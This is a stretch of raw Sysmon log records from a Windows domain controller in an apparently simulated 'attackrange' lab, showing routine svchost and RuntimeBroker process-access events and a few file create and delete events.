11241100x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.479{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.479 23542300x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.479{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.448{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.433{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.417{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.402{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.371{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.355{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.355{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.355{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.308{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.308{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
